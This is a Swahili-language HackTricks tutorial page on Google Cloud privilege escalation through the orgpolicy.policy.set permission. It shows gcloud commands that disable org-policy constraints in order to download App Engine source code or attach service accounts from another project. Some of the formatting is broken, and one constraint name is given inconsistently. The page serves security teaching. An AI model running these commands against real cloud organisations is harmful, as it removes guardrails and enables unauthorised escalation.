GCP - Orgpolicy Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Mshambuliaji akitumia orgpolicy.policy.set anaweza kuendeleza mabadiliko kwenye sera za shirika (organizational policies), jambo litakalomruhusu kuondoa vikwazo fulani vinavyokwamisha operesheni maalum. Kwa mfano, kizuizi appengine.disableCodeDownload kawaida huwa kinazuia kupakua msimbo wa chanzo wa App Engine. Hata hivyo, kwa kutumia orgpolicy.policy.set, mshambuliaji anaweza kuzima kizuizi hiki, na hivyo kupata uwezo wa kupakua msimbo wa chanzo, licha ya awali kilikuwa kinalindwa.

Pata taarifa za org policy na kuzima utekelezaji

```bash # Get info gcloud resource-manager org-policies describe [--folder | --organization | --project ]

Disable

gcloud resource-manager org-policies disable-enforce [–folder | –organization | –project ]

</details>

Script ya Python kwa njia hii inaweza kupatikana [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).

### `orgpolicy.policy.set`, `iam.serviceAccounts.actAs`

Kawaida haiwezekani kuambatanisha service account kutoka project tofauti kwenye resource kwa sababu kuna policy constraint inayotekelezwa iitwayo **`iam.disableCrossProjectServiceAccountUsage`** inayozuia kitendo hiki.

Inawezekana kuthibitisha kama constraint hii inatekelezwa kwa kuendesha amri ifuatayo:

<details>
<summary>Thibitisha constraint ya cross-project service account</summary>
```bash
gcloud resource-manager org-policies describe \
constraints/iam.disableCrossProjectServiceAccountUsage \
--project=<project-id> \
--effective

booleanPolicy:
enforced: true
constraint: constraints/iam.disableCrossProjectServiceAccountUsage

Hii inamzuia attacker kutoka kutumia vibaya ruhusa iam.serviceAccounts.actAs kuigiza service account kutoka project nyingine bila ruhusa nyingine za infra zinazohitajika kuanzisha VM mpya kwa mfano, jambo ambalo linaweza kusababisha privilege escalation.

Hata hivyo, attacker mwenye ruhusa orgpolicy.policy.set anaweza kupitisha kizuizi hiki kwa kuzima constraint iam.disableServiceAccountProjectWideAccess. Hii inamwezesha attacker kuambatisha service account kutoka project nyingine kwenye resource katika project yake mwenyewe, na hivyo kusababisha privilege escalation.

Disable cross-project service account constraint

```bash gcloud resource-manager org-policies disable-enforce \ iam.disableCrossProjectServiceAccountUsage \ --project= ```

References

https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.